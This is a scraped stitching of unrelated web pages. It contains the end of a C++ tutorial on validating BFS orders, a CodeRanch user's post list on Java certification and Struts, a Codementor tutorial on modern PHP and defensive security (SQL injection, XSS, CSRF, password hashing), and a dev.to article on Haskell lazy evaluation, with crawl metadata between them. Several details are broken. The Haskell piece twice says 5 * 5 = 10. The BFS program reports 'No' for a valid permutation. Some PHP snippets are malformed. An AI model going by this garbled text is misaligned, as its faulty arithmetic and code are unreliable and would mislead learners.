0; while (!q.empty() && i < n) { // In case the current node has already been visited, return false. if (visited.count(bfs[i])) { return false; } visited.insert(bfs[i]); // If all the child nodes of the previous nodes have been visited, then pop the front element of the queue. if (q.front().empty()) { q.pop(); } // Return false, if the current element of the permutation cannot be found in the set at the top of the queue. level = q.front(); if (level.count(bfs[i]) == 0) { return false; } level.clear(); // All the children of the current node are pushed into the 'LEVEL' hashset and then this hashset is pushed into the queue. for (int &j : tree[bfs[i]]) { if (!visited.count(j)) { level.insert(j); } } if (level.empty() == false) { q.push(level); } // The current node is erased from the set at the top of the queue. q.front().erase(bfs[i]); // The index of permutation is incremented. i++; } return true; } int main() { // Given adjacency list representation of tree. unordered_map<int, vector<int>> tree; tree[3].push_back(7); tree[7].push_back(3); tree[3].push_back(2); tree[2].push_back(3); tree[2].push_back(8); tree[8].push_back(2); tree[2].push_back(13); tree[13].push_back(2); tree[8].push_back(14); tree[14].push_back(8); tree[13].push_back(4); tree[4].push_back(13); // BFS permutation. vector<int> bfs = {3, 2, 7, 13, 8, 14, 4}; // Calling the function and checking whether the given permutation is a valid BFS of a given tree. if (isValidBFS(bfs, tree)) cout << "Yes, the given permutation is a valid BFS of a given tree." << endl; else cout << "No, the given permutation is not a valid BFS of a given tree." << endl; return 0; } Output No, the given permutation is not a valid BFS of a given tree. Time Complexity The time complexity is O(N), where N is the total number of nodes in the given tree. We are traversing all the N nodes using a while loop, and at every step, we are doing the constant amount of work, therefore, the time complexity is O(1 * N) = O(N). Space Complexity The space complexity is O(N), where N is the total number of nodes in the given tree. Extra space in the form of HashSet, hashmap, and the queue is being used which consumes a space of O(N). Key Takeaways So, this blog discussed the problem, check if the given permutation is a valid BFS of a given tree. Head over to CodeStudio to practice problems on topics like Graphs, and Trees and crack your interviews like a Ninja! Practicing a bunch of questions is not enough in this competitive world. So go check out where you stand among your peers by taking our mock tests and see which areas need improvement. Feel free to post any suggestions in the comments section.
https://www.codingninjas.com/codestudio/library/check-if-the-given-permutation-is-a-valid-bfs-of-a-given-tree
CC-MAIN-2022-27
refinedweb
1,043
72.76
FAQs Search Recent Topics Flagged Topics Hot Topics Best Topics Register / Login Alex Pol Ranch Hand 33 15 Threads 0 Cows since Sep 29, 2006 Cows and Likes Cows Total received 0 In last 30 days 0 Total given 0 Likes Total received 0 Received in last 30 days 0 Total given 3 Given in last 30 days 0 Forums and Threads Scavenger Hunt (keep public parts private until JForum day) Ranch Hand Scavenger Hunt Number Posts (33/100) Number Threads Started (15/100) Number Cows Received (0/5) Number Likes Received (0/10) Number Likes Granted (3/20) Set bumper stickers in profile Report a post to the moderators (0/1) Edit a wiki page (0/1) Create a post with an image (0/2) Greenhorn Scavenger Hunt First Post Number Posts (33/10) Number Threads Started (15/10) Number Likes Received (0/3) Number Likes Granted (3/3) Set bumper stickers in profile Set signature in profile Set a watch on a thread Save thread as a bookmark Create a post with an image (0/1) Moderation Tools Recent posts by Alex Pol OCMJEA - 5 or 6? I see on the Oracle website that currently they offer certification for JEE5 (OCMJEA). Is it worth it? If I start preparing for JEE5 and they eliminate it when introducing the certification for JEE6, this will mean I have lost a bit of time. Please advise. show more 5 years ago Architect Certification (OCMJEA) OCPJWSD vs OCEJWSD Hello, Please tell me what's the difference between these two exams? One is "professional" and one is "expert"... which one should i take? i saw that one is jee5 and the other one jee6 but what's with the different naming? Thanks show more 5 years ago Web Services Certification (OCEJWSD) passed OCMJEA congratulations! please share your experience, how did you train, what did you read, etc. show more 5 years ago Certification Results From experience - books and other training materials Thank you, Jeanne. I looked through your links, they provide a very useful reference. Any other impressions are welcome. show more 5 years ago Architect Certification (OCMJEA) From experience - books and other training materials Hello, I already am SCJP, SCBCD, SCWCD. I've been working in J2EE for quite a few years now, reading some materials, doing a few J2EE designs here & there , and I feel like it's time to move forward and try the SCEA/OCMJEA. Of course, some formal preparation will be needed first. I know there is an entire list of books in the "FAQ" section, but i'm pretty sure nobody can go through ALL those books. At least not somebody with a job So what i'm interested is: what should I read, what is really necessary from that list? I'm expecting there is no silver bullet, but your experience would be a lot helpful to me. From what I noticed around here, I saw that Cade/Sheil is highly recommended, and also Fowler's "UML Distilled". I have already read Sierra/Bates's EJB 3 book (for my SCBCD exam). Any other recommendations? Thanks to all in anticipation! show more 5 years ago Architect Certification (OCMJEA) Upgrade certification from 1.4 to 6 Hello, I have a few questions 1. Can I take the upgrade exam for Java 6 (CX-310-066) if I have the Java 1.4 SCJP? 2. Maybe it's better if i take directly the SCJP6 exam (CX-310-065)? Their cost is the same 3. The upgrade exam will contain only things introduced in Java 5 and Java 6? Or only things introduced in Java 6? Or...? 4. Which books should I use to prepare for the upgrade exam? What about for the CX-310-065? Thank you. show more 7 years ago Programmer Certification (OCPJP) html-el:checkbox readonly? Hi, How can i make a html-el:checkbox readonly? I cannot make it "disabled" because like this it's not read from the form. Thanks. show more 8 years ago Struts Enthuware (RegSoft) fraud? Hello all, I purchased the software from Enthuware for the SCBCD 5 exam, and in addition to the 35$ the exam cost (30$ + taxes) i also got robbed of an additional 12$ which stay blocked on my visa card. Why do the 12$ stay blocked on my card?? show more 8 years ago EJB Certification (OCEEJBD) Sorting problem I have a map in which the key is a customerId (a String), and the value is a collection of objects of type T, which have an attribute BigDecimal "value" and another attribute String "manufacturer" which can take 2 values: "manuf1" and "manuf2". I want to obtain the top 10 of customers, and to display for each the total "value", the value for manuf1 and the value for manuf2 (these are sums of course) Any ideas are appreciated. Thanks show more 9 years ago Beginning Java I get ServletException from a very simple html form in what log? at the console i don't have log show more 9 years ago Struts I get ServletException from a very simple html form Doesn't work with slash, i get: type Status report message /xlsImportAction.do description The requested resource (/xlsImportAction.do) is not available. show more 9 years ago Struts I get ServletException from a very simple html form Hello all, I have this html page : <html> <body> <form method="POST" enctype="multipart/form-data" action="xlsImportAction.do"> Select Excel file:<br/><input type="file" name="upfile"/> <input type="submit" value="Import"/> </form> </body> </html> this action in struts: <action path="/xlsImportAction" name="xlsImportForm" type="com.rolandberger.analytics.web.actions.XLSImportAction" scope="session" /> this form: import org.apache.struts.action.ActionForm; import org.apache.struts.upload.FormFile; /** * Contains the path of the file we want to import * @version 1.0 * @created 22-September-2008 */ public class XLSImportForm extends ActionForm { /** * The logger used in this class. */ private FormFile upfile; public FormFile getUpfile() { return upfile; } public void setUpfile(FormFile upfile) { this.upfile = upfile; } } and this action: public class XLSImportAction extends Action { /** * The logger used in this class. */ private static Log log = LogFactory.getLog(XLSImportAction.class); public ActionForward execute( ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response) throws Exception { if (log.isInfoEnabled()) { log.info(""); } return mapping.findForward("doesntmatter"); } } And it doesn't work. It doesn't enter my action, i get: javax.servlet.ServletException: Servlet execution threw an exception org.apache.catalina.core.ApplicationFilterChain:internalDoFilter (292) org.apache.catalina.core.ApplicationFilterChain oFilter (188) org.apache.catalina.core.StandardWrapperValve:invoke (213) org.apache.catalina.core.StandardContextValve:invoke (172) org.apache.catalina.core.StandardHostValve:invoke (127) show more 9 years ago Struts Yes, I need a Head First EJB 3.0 book! Bert, Let me know when you get out a ME book Looking forward to it as I to am interested in this domain. Alex show more 10 years ago Bunkhouse Porch Enthuware BCD 5 Simulator Mr. Anil, do you make shipments in Romania? show more 10 years ago EJB Certification (OCEEJBD) Passed SCWCD with 89% HFSJ, a bit of Mikalai's notes, and the Whizlabs exam simulator. That's all, folks show more 10 years ago Certification Results
https://coderanch.com/u/135131/Alex-Pol
CC-MAIN-2018-09
refinedweb
1,199
55.34
I have a Sting in my program I need to reverse this Sting and save it. How can I reverse a Sting in Java? Explain with an example. StringBuffer class of the java.lang package provides reverse() method. This method returns a reverse sequence of the characters in the current String. Using this method you can reverse a string in Java. import java.lang.*; public class StringBufferDemo { public static void main(String[] args) { StringBuffer buff = new StringBuffer("tutorials point"); System.out.println("buffer = " + buff); // reverse characters of the buffer and prints it System.out.println("reverse = " + buff.reverse()); // reverse of the buffer is equivalent to the actual buffer buff = new StringBuffer("malyalam"); System.out.println("buffer = " + buff); // reverse characters of the buffer and prints it System.out.println("reverse = " + buff.reverse()); } } Output: buffer = tutorials point reverse = tniop slairotut buffer = malayalam reverse = malayalam Following example shows how to reverse a String after taking it from command line argument. The program buffers the input String using StringBuffer(String string) method, reverse the buffer and then converts the buffer into a String with the help of toString() method. public class Sample { public static void main(String args[]){ String str = new String("Hello how are you"); StringBuffer sb = new StringBuffer(str); String str2 = sb.reverse().toString(); System.out.println(str2); } } Output: uoy era woh olleH
https://www.tutorialspoint.com/How-to-reverse-String-in-Java
CC-MAIN-2018-30
refinedweb
221
58.38
A scope is a region of the program and broadly speaking there are three places, where variables can be declared − Inside a function or a block which is called local variables, In the definition of function parameters which is called formal parameters. Outside of all functions which is called global variables. We will learn what is a function and it's parameter in subsequent chapters. Here let us explain what are local and global variables. Variables that are declared inside a function or block are local variables. They can be used only by statements that are inside that function or block of code. Local variables are not known to functions outside their own. Following is the example using local variables − #include <iostream> using namespace std; int main () { // Local variable declaration: int a, b; int c; // actual initialization a = 10; b = 20; c = a + b; cout << c; return 0; } − − #include <iostream> using namespace std; // Global variable declaration: int g = 20; int main () { // Local variable declaration: int g = 10; cout << g; return 0; } When the above code is compiled and executed, it produces the following result − 10 When a local variable is defined, it is not initialized by the system, you must initialize it yourself. Global variables are initialized automatically by the system when you define them as follows − It is a good programming practice to initialize variables properly, otherwise sometimes program would produce unexpected result. 154 Lectures 11.5 hours 14 Lectures 57 mins 30 Lectures 12.5 hours 54 Lectures 3.5 hours 77 Lectures 5.5 hours 12 Lectures 3.5 hours
https://www.tutorialspoint.com/cplusplus/cpp_variable_scope.htm
CC-MAIN-2022-21
refinedweb
263
61.26
Joins Joins are used to join a list with a particular character or a sequence of character letters = [‘a’, ‘b’, ‘c’, ‘d’] print ” “.join(letters) # Prints a b c d print “+++”.join(letters) #Prints a+++b+++c+++d TRY IT OUT Try out the example given below and see the result you are getting. Firstly go through the code and try to predict the answer that will appear in the console and finally run the code to verify whether the value in the console matches with the answer you interpreted while going through the code. boat=[] for i in range(5): boat.append([“P”]*5) def print_boat(boat): for item in boat: print ” “.join(item) print_boat(boat) You now have a fair bit of knowledge on how to take the data from the user and how to make a list. Using this, try to make a program which takes number of rows and number of columns from the user and make a matrix of size row*col. Hint: row = int(raw_input(“Guess Row:”)) col = int(raw_input(“Guess Col:”)) //Now define the logic to make a matrix of row”*col size. IF ELSE Suppose you go to a shop and you want to buy only fruits if you have money between 10 dollars and 20 dollars and you want to buy fruits and vegetables too if you have more than 20 dollars. How will you go about coding such problem. You then will require if, else and elif conditions to write a code for it. In if or else condition, You can have more than one condition also linked with each other through ‘and’ and ‘or’. Example : if money > 10 and money <20 : shop_fruits() elif money >20 and money<40: shop_fruits_and_vegetables() else: shop_everything() NOTE: We always use a colon(‘:’) to indicate an end of if or else clause while writing our code. TRY IT OUT: Question : Write a code to take number of people, cars and trucks from the user and if cars are greater than truck , print “We should take the cars”, if cars are greater than people then print “We should not take the cars” and in all other scenario print “We can’t decide.” Solution : people = int(input(“Enter number of people”)) cars = int(input(“Enter number of cars”)) trucks = int(input(“Enter number of trucks”)) if cars > people: print “We should take the cars.” elif cars < people: print “We should not take the cars.” else: print “We can’t decide.” Python tuples A tuple is another sequence data structure that is used to store data. A tuple consists of a number of values separated by commas just like lists but they are enclosed with ‘(’ and ‘)’. The major difference between tuple and lists is that tuples cannot be updated and can only be accessed whereas lists can be accessed as well as updated. Tuples can be used to store username which can not be altered. Tuples can be thought of as permanent list which is used only for accessing and storing values. tuple = ( ‘hello’, ‘python!’ ,’You’, ‘rock!!!!’, 7 ) list = [‘hello’, ‘python!’ ,’You’, ‘rock!!!!’, 7] print tuple # Prints complete tuple print tuple[3] # Prints fourth element of the tuple print tuple[2:3] # Prints elements starting from 3nd till 4rd element print tuple[2:] # Prints elements starting from 3rd element tuple[1] = ‘java’ # This will throw an error as tuple can’t be updated list[1] = ‘java’ # Update the 2nd element of list to java
http://knowledgetpoint.com/python/python-fundamentals/
CC-MAIN-2017-34
refinedweb
576
67.28
Crosshair Crosshair is a pointer represented by two mutually-crossing lines stretched over the entire chart plot. The crosshair helps a user identify values of the series points precisely. When enabled, the crosshair follows the cursor and snaps to the nearest series point. To enable the crosshair, set the crosshair.enabled option to true. To show the crosshair labels, do the same with the crosshair.label.visible option. jQuery JavaScript $(function() { $("#chartContainer").dxChart({ // ... crosshair: { enabled: true, label: { visible: true } } }); }); Angular HTML TypeScript <dx-chart ... > <dxo-crosshair [enabled]="true"> <dxo-label [visible]="true"></dxo-label> </dxo-crosshair> </dx-chart> import { DxChartModule } from "devextreme-angular"; // ... export class AppComponent { // ... } @NgModule({ imports: [ // ... DxChartModule ], // ... }) For information about all options of the crosshair and its labels, visit the crosshair section of the.
https://js.devexpress.com/Documentation/19_1/Guide/Widgets/Chart/Crosshair/
CC-MAIN-2021-39
refinedweb
126
52.76
Codementor PHP expert Ben Edmunds joined us for an Office Hour session to share some of his knowledge in PHP security. Ben Edmunds is the co-host of PHP Town Hall and the creator of Ion Auth, a CodeIgnitor authentication library for security. Ben has also authored the book “Building Secure PHP apps”. The text below is a summary done by the Codementor team and may vary from the original video and if you see any issues, please let us know! Topics that we’ll be covering are as follows: - Exceptions - Closures - Namespaces - Statics - Shorty Array Syntaxes - PDO for SQL and databases - Security - Legit Tools A Quick Introduction To better follow the security tips later, there are a few core concepts to understand, and here is a quick overview of what modern PHP is. Exceptions To catch an exception, a try catch block is recommended. Instead of returning a mere error code, the block will return an exception message about what went wrong. The method will save programmers from having to constantly do a trial and error to test how things respond. try { //your code goes here } catch (Exception $e) { die($e->getMessage()); } An example of a try catch block. The real key is the exception object returned, as it can be different exception objects and does not have to be a generic one. Closures In previous years with PHP, functions had to be named. Now, like Javascript, PHP now also supports closures, or anonymous functions. Route::get(‘/', function(){ return View::make(‘index'); }); A laravel style example of a closure. In the example above, the return index is passed for just a one-time use. What should be noted is there is some difference in the scoping between PHP and Javascript closures. In Javascript, $this constantly changes based on the scope of how deep callbacks are, but PHP doesn’t have that issue. Instead, in PHP there is the “use” command, which gives access to external variables inside callbacks. Namespaces Namespaces are logical groups or containers for similar objects. When using two different libraries that share the same class name and will interfere with each other as well as make things confusing, namespaces should be used. namespace Illuminate\Console; class Command { //... use Illuminate\Console\Command; In this example, the command class will be defined as a part of the illuminate\console namespace. At the bottom is a command to begin using a namespace, and after using it one can then call their class as they normally do. Namespaces can go as deep as a coder wants, and the idea behind namespaces is to put pieces of code under one container that serves as a separator and also makes it easier to figure out what will come out. For example, when injecting different things into the controller, namespaces makes it possible to check back and make sure what class is used (e.g. the DB class, the illuminate DB class or some other DB class someone else put in, etc.) Statics The use of statics is controversial in the PHP world because of how they were often used inappropriately. However, a good situation to use statics is when there are random related functions that don’t need object-oriented inheritance. Static functions are self-contained and don’t need much of a scope. A good example of when to use statics is in a form helper with no form object to call on. A form helper would consist of shortcuts to creating a form, inputs, etc., which is just calling functions inside the view to build out the html. A bad example is to use statics to retain state, i.e. building an object to add and remove things from where the scope and state of an object is retained through time. Although there are ways to hack around this issue such as using statics as a shortcut to IoC, the general consensus is to stick with the convention to avoid confusing other programmers who may be sharing the project. Class Route { public static function get() { //... } Route::get(); The double colon in the example is what will make it a static call instead of a class call, which uses an arrow. In this static example, the code directly calls on the parent class without having to define a variable to stick in. Furthermore, there is no $this object inside of a static, and there’s a difference in the scoping of variables depending on whether they are defined inside or outside of a static, whether they’re part of the parent class or not, etc. Thus, it may be worthwhile to read up on how scoping works inside statics. Short Array Syntax Although rather inconsequential, this neat new function is a blessing to the lazy coders as well as those who are used to coding with the Javascript language. Basically, instead of having to code the following line: $array = array( 0 => ‘value1’, 1 => ‘value2’, ); One can now just use brackets like this: $array = [ 0 => ‘value1’, 1 => ‘value2’, ]; PDO PDO has been slowly gaining popularity in the recent two year, so it is now normal to see it used. It’s a nice class and a great way of handling database abstractions, as it gives a good database layer that works across other databases. For example, since it PDO is cross system, both PostresSQL and MySQL have the same API for interacting with PDO. The systems that support PDO are: - MS SQL - MySQL - Oracle - PostgreSQL - SQLite - CUBRID - Firebird - Informix - ODBC & DB2 - 4D $stmt = $db->prepare(‘ SELECT * FROM users WHERE id=:id ’); $stmt->bindParam(‘:id’, $id); $stmt->execute(); The :id in the example is a placeholder for a variable, and the statement bind command gets the id variable before it executes. At first it may seem stupid to do the extra work of retrieving the id variable instead of sticking it into the query in the example above. However, the difference is that doing so will automatically escape the value for you. The code will also run through a different execution loop, so in a WHERE or WHERE, WHERE and WHERE, the bind parameter will not allow anything to break out of the tree it should be in. In contrast, a straight SQL query that does not escape properly will be mistaken as being over, and users would be deleted. As this sort of execution can be stopped by Bind the Parameter, it is highly recommended to use it, as it makes life easier and codes safer. The language can handle security, so there is no need to be self-reliant. Security After the overview, hopefully you now have a better idea about what modern PHP is, and will have an easier time understanding the biggest security issues it currently faces: - SQL injection - HTTPS - Password hashing - Authentication - Safe defaults - XSS & CSRF SQL Injection A SQL injection takes data and manipulates the id, and this sort of attack is usually seen in forum posts. Some assume that, since a post has a hidden ID variable fill and a hidden input with the ID, a user can’t change the post ID since it is hidden. However, the assumption is wrong, as anyone can copy the form, inspect it in their web browser, and change anything they want before they submit it. Thus, any input from a user cannot be trusted and could be bad, malicious, or incorrect data. An example of the problems that may arise when users input incorrect data can be examined through the case where a database using an input field with VarChar(10). If input is not properly checked, a user who sends something over the maximum length of 11 characters will not have their input recognized on IE6. It may be helpful to think about whether the data is expected or valid and then try to handle them through validation, typecasting, trimming, or the like. Another thing to keep in mind is MySQL will just truncate the characters that exceed the maximum length, but the PostgresSQL will give back an exception, which will eventually give false data. Therefore, it is always better to handle any kind of restrictions on data in the code when possible to prevent invalid data from getting into the database. Escaping input before it goes into the database will protect the database from SQL injection. Escaping output is also important, as one never knows what a user will submit (e.g. html, javascript, etc) and what will happen when the input is displayed directly back to the page. HTML entities will be the go-to function 90% of the time for cleaning data up before it is put back onto the screen. And, as mentioned previously, PDO makes it extremely easy to bind parameters. //escaping input $stmt->bindParam(‘:id’, $id); //escaping output htmlentities($_POST[‘name’]); Therefore, the bind parameter for PDO will handle SQL injections for the programmer. If using a different or older library, PHP still has built-in functions for escaping. In conclusion, simply use built-in functions to deal with SQL injections, as the PHP developers will think of more use-cases and hit more different issues in servers than a single programmer. HTTPS/SSL For safe end-to-end encryption, HTTPS/SSL will be the easiest and most secure option. It will encrypt traffic across the wire and who is the sender and who is the receiver. Anything that goes through the “pipe” once the connection is made will be secure, as it will be encrypted and no one can look in on it. As certificates are required, it is important to make sure both sides have valid certificates, though it could be expensive depending on where one gets the certificates. For example, the average is probably around $1000 for a certificate, but many shared hosts such as DNSimple will have special plans and offer $20/month for an SSL certificate. Naturally it will be safer to buy from the certificate authority as it would be possible to transfer between servers or DNS hosts, but if saving money is more important, then it would be a good idea to check offers made by one’s host. Another solution is to create a certificate and ask users to download it to their computer, but the method is not recommended, as good users know not to trust random authorities from websites they don’t know. Authentication Problem arises when a login screen does not check whether a user is qualified to enter the administrator panel and simply assume a user to be an administrator if they manage to get in. This makes a site vulnerable to a malicious user who guesses the administrator login url or finds a way to scrape it somehow, who then consequently find a way to get into the administrator panel. A method to counter this issue is through using a constructor where the administrator panel is the controller. //authentication - access control if (!$user->inGroup(‘admin’)) { return ‘ERROR YO’; } Pull in the current user through the constructor and check to see if they have authorized access to the controller. If the user does not have authorized access, return some type of error, redirect them to an error page, or take them back to where the user should be. Try to check their access as soon as possible instead of waiting until right before the view is displayed, as they may still be able to access the admin panel. Therefore, the sooner an unauthorized user is taken out of the execution path, the safer it will be for future changes. Another issue with login many will miss is brute forcing. If there is no protection against brute forcing, it is trivial to break anyone’s account, as up to 90% of users would use the same password everywhere, and worse those passwords might be on the list of the most popular passwords used. Therefore, if a site has no check against brute forcing, someone can run a brute force login tool against the site and the hacker would be in users’ accounts in minutes or hours. The simplest way to prevent brute forcing will be to track login attempts within a certain period of time. //authentication - brute force if ($user->loginAttempts > 5) { return ‘CAUGHT YA’; } For example, limit the number of login attempts to 5 tries in 10 minutes or whatever is reasonable. Curbing the number of login attempts with a big enough period would slow down anyone trying to hack into a website, making it too much of a cost for hackers to continue. A good way to do that is to keep an IP list and a username or an email list, as this way it will be clear when the same IP tries to hit several different user accounts, and it would be easier to stop that IP. It should be noted, however, that in a company this method should be approached with more care, as many users in the same building would share the same IP because they all route through one public IP to get out of the building. If that is a concern, it will be a good idea to raise the limit for login attempts to a much higher account. Safe Password Hashing PHP programmers no longer need to worry about encryptions such as md5 or SHA1, as PHP now includes a safe, built-in password hashing, which means it will use the newest, most secure, or most accepted hashing algorithm. PHP will provide a common API to use now and also in the future for password hashings, which includes functions to verify the correct password. //safe password hashing password_hash($_POST['pass']); //password verification password_verify($_POST['pass'], $u->pass); The top will be used before the password sorting database, while the bottom line will be the login function. In the example above, whatever the user types into the login screen will be passed, and then the password will be pulled out of the database to see whether the two match. As this would be a hash stored into the database, it would not be pulling text password. Furthermore, as there will be a unique salt in the algorithm for every user, different users with same passwords would still have different hashes. When verifying, the database will pull the salt back out and rehash the password with the same salt. Safe Defaults A common problem many have encountered is when they define and use a variable direct that starts as a certain value but ends up going through a different controller method, ending up with a value that is not what was expected. Therefore, it is best to define what the default value should be as soon as possible, ideally at the top of controllers. //safe defaults class Your Controller { protected $var1 = ‘default value’; function __construct() { ... } } If more mutations or work are needed, those should be done in the constructor. As soon as the default values can be certified, it will prevent a loop from happening. //safe defaults $something = false; foreach ($array as $k => $v) { $something = $v->foo; if ($something == ‘bar’) { ... } } This foreach is vulnerable, since if for some reason the initialization has not be hit because it has been accessed through a different path, the logic would be thrown into a loop as the value was expected to be false by default. When defining defaults, try to be more explicit, since this will make it easier for other developers in the same project to understand what the default value should be without having to know what is going on in the foreach. XSS Cross-site scripting is a common hack that exploits URL that is not properly escaped. A simple paging URL. If someone can guess the URL and changes it to page_num=2&action=delete and the page takes it for some reason, however…. It is important to escape URLs properly, since anyone can watch the URL, see what is happening in the URLs, and eventually use them to perform certain actions. An example of a potential threat of is a malicious user creating a test account, deletes the account, and figures out the URL to do so. In a non-persistent XSS attack, the malicious user then generates the URL to delete a user account with someone else’s user ID, somehow sends the URL to the user either through a link on another site or from an email. The unknowing user, who is still logged in with a valid account and session data, clicks on the link and ends up deleting their own account. In a persistent XSS attack, the URL is saved into the website’s server and may be presented as a post with HTML or Javascript. For example, it could be a facebook status, in which a user comes back to look at a page with that status and ends up with something nefarious. XSS can usually be protected with the following method: < h1 >Title< /h1 > Hello htmlentities($name)?> Anything generated by a client or user should be escaped before they are displayed back. Cross Site Request Forgery CSRF is similar to XSS attacks, but slightly different. A way to understand CSRF is it could be a form that responds to anything. If there is a post/put/update/delete action, it does not necessarily respond to http verbs, but instead the actual action that is performed. If data is being changed, it needs to be behind a form in a system with a token that can only be used once—also known as nonces. This would ensure the action was initiated by the user and came from a form recently supplied by the website. function generateCsrf() { $token = mcrypt_create_iv( 16, MCRYPT_DEV_URANDOM); Session::flash('csrfToken', $token); return $token; } if ( $_POST['token'] == Session::get(‘csrfToken') ) {... } The example above shows how to use tokens, in which the code will be used as a hidden field in a form. It will generate a unique token, save it into the session, and then return it so it can be put into the form. After the form is posted, the token can then be checked if it matches the one stored in the site’s sessions. Basically, nonces make it so forms can be only good once. However, it could cause problems if there are two forms on a page or there is AJAX in the page. The simplest solution is to store an array of valid tokens for a session, and then have the garbage collection routine delete the tokens after some seconds or minutes. (E.g. Having all tokens good for five minutes before they expire.) Legit Tools Ruby had cool tools for a long time, but PHP finally has some legit tools as well, and Ben shared his thoughts about them with us. Built-in Web Server There is now a built-in server for local development where sites can be tested by running php –S in the host, which will be served out into a port. To see the site, just go into a browser and type in localhost:8000. However, this method is not resilient and therefore it is not recommended for going into production with, but it is a great way to test something locally. Furthermore, the built-in web server also makes it easy to switch between projects without having to worry about keeping a list of host entries. Composer Composer is finally a good, secure package manager for PHP with a sane format. // composer.json { "require": { "stripe/stripe-php": "dev-master", "twilio/sdk": "dev-master" } } All one needs to do is to define their composer.json file, what packages should be pulled in, and then a couple simple commands to get set up and going. $ php composer.phar update $ php composer.phar install There is a simple updating or installation command for any changes since the composer was last used. There are also advanced uses, such as locking files to keep the exact system versions in place to be properly gotten to the servers and the rest of one’s team. Furthermore, composer also has an autoloader built in. $client = new Services_Twilio($sid, $tkn); $client->account ->messages ->sendMessage(...) The autoloader is a great addition, as it will know how to look up a file based on the way things are namespaced. Thus, the PHP coder no longer has to worry about figuring out the whole path down inside a certain class into a certain library he or she has never used. Unit Testing There are a lot of tools coming out for unit testing (at last!), and here is just a very small selection of the more popular ones: - PHPUnit (strict unit testing) - Selenium (browser testing) - CodeCeption (BDD testing) - Behat (BDD testing) - Mink (Web acceptance testing) - PHPSpec (Inspection testing) In conclusion, all these tools are to make sure the program does what it is expected to. class ApiAuthTest extends PHPUnit_Framework_TestCase { public function testVerify() { $auth = new apiAuth(); $this->assertTrue($auth->verify()); $ phpunit tests PHPUnit 3.3.17 by Sebastian Bergmann. Time: 0.01 seconds OK (1 tests, 1 assertions) A simple test case to verify an API authentication. Here it is expected for the response of the function to be true, whereas in the case where it is expected to be false, AssertFalse should be used instead. It is also possible to assert the expected response to be of a certain value. The point of a unit test is to ensure every component in a code behaves properly to valid and invalid data, and also returns what is expected in each case. Other tools that will likely be seen the most will be for acceptance testing, which confirms that not only do individual components work, but the entire system together works. Therefore, acceptance testing will usually be done through a browser or a command line tool to check the interactions in the system and whether the final output turns out as what is expected. To run the tests, simply run the PHPUnit test, as it will go through and run all the tests in the test folder. At the end it would give an output of how many tests and assertions there are as well as if there were any errors. Resources PHP.net is the best resource for looking up functions, methods, or anything built into the language. PHPtheRightWay is a website and recently a book, which is highly recommended. It’s created by John Lockart, who also created the Slim Framework for PHP, and the PHP community has gotten together to work on this resource to let people know what modern PHP looks like. Recommended Modern Frameworks Building Secure PHP Apps And finally, of course Ben’s book is also a great resource. It’s a short read around 200 pages. The topics covered here are explained in much more detail, and you can use the coupon code “codementor” to get $3 off! Other posts in this series with Ben Edmunds: - Should PHP developers Also Handle DevOps? - Tutorial: The Best Way to Store Passwords in a Database - Q&A With PHP Security Expert Ben Edmunds - The Most Common Reason a Hacker Attacks Your PHP Applications Need Ben’s help? Book a 1-on-1 session! or join us as an expert mentor! Codementor is your live 1:1 expert mentor helping you in real time.
https://www.codementor.io/php/tutorial/building-modern-secure-php-applications
CC-MAIN-2017-47
refinedweb
3,891
65.56
Lazy evaluation in Haskell Elias Hernandis Updated on ・4 min read Cover image by Andreas Kay licensed under CC BY-NC-SA 2.0. A version of this article previously appeared in my blog. This article is part of a series on Haskell about how easy it is to define infinite structures in really concise ways. Lazy evaluation is an evaluation strategy that is the foundation of many features of haskell, from performance to expressiveness. In this first article, we explore different evaluation strategies found in other languages, how they compare to Haskell's and their benefits and drawbacks. No Haskell knowledge is required for this first post :) Call me by your value When discussing different families of programming languages, we sometimes use the phrases call-by-value to refer to how parameters are passed to a function when it is called. Consider the following code in a generic language def f(a, b): return a * 2 If we say the language is call-by-value we mean that the variables a and b are evaluated before copies of them are passed to the function f. For instance, if we called f with arguments a = 2 + 3 and b = 3 * 3 the following would happen in a call-by-value language: f(a, b) = f((2 + 3), (3 * 3)) = f(5, (3 * 3)) = f(5, 9) = 5 * 2 = 10 It takes roughly 5 steps to compute the value f(a, b). Observe that even though the value of f is only dependent on the value of a, the parameter b is still evaluated. We call this evaluation strategy strict, because it does not care about the usefulness of the values, it just computes everything as a very stubborn robot would do. This is the case with some low-level languages like C.1 Call me by your name What if we delayed evaluation until the parameters were actually needed? We call this call-by-name and it is an example of a non-strict evaluation strategy. Let's look at how the previous computation would look like with a call-by-name approach: f(a, b) = f((2 + 3), (3 * 3)) = (2 + 3) * 2 = 5 * 2 = 10 Wow! We saved one step! This is not too much but suppose that a and b weren't simple arithmetic expressions but complex computations instead. Then not computing b would certainly be beneficial. Is this always the case? Unfortunately, it turns out, it isn't. Look at the following definition and compare the two evaluations: def square(a): return a * a -- Call-by-value (strict) evaluation square(a) = square((2 + 3)) = square(5) = 5 * 5 = 25 -- Call-by-name (non-strict) evaluation square(a) = square((2 + 3)) = (2 + 3) * (2 + 3) = 5 * (2 + 3) = 5 * 5 = 10 Yikes! That's one more step. Now a natural question is, which evaluation strategy makes more sense? Call-by-name seems better since unused values are not computed... Also, why did we calculate (2 + 3) twice? Couldn't we have stored the value for the second calculation? Call me lazy Turns out if we add sharing to call-by-name, this strategy will never take more steps to evaluate an expression than call-by-value. We call this call-by-need or lazy evaluation in the context of Haskell. Call-by-need is also a form of non-strict evaluation but has this added benefit of never introducing a performance penalty (well, at least in the number of steps2). Let's look at how the previous examples would look like if we used call-by-need. f(a) = f((2 + 3)) = (2 + 3) * 2 = 5 * 2 = 10 square(a) = square((2 + 3)) = (2 + 3) * (2 + 3) = 5 * 5 = 10 We can see that in both cases the evaluation takes fewer steps than call-by-name or call-by-value. Closing words Call-by-need or lazy evaluation is central to both the performance and expressiveness of the Haskell language. In addition, the Haskell compiler has pureness and a strong type system at its disposal, enabling it to make much more aggressive optimisations than would be possible in other languages. More simply, expressiveness in Haskell does not come with a performance price to pay. In the following articles we will apply lazy evaluation to create infinite structures. If you want to read more about evaluation strategies, you can check out this wikipedia article Although in some languages we may substitute call-by-name with call-by-reference, the idea of strict evaluation still applies — all parameters are evaluated before the function call — only in call-by-reference the address of the value is passed instead of a copy of the value itself, allowing the function to modify it. ↩ It may, however, introduce a memory usage penalty, but these cases are more rare and easier to detect and fix just by rewriting the order of arguments. ↩ What Advice Would You Give Your 20-year-old Self? If you could go back in time, what advice would you give your 20-year-old self?
https://dev.to/knifecake/lazy-evaluation-in-haskell-15of
CC-MAIN-2019-47
refinedweb
845
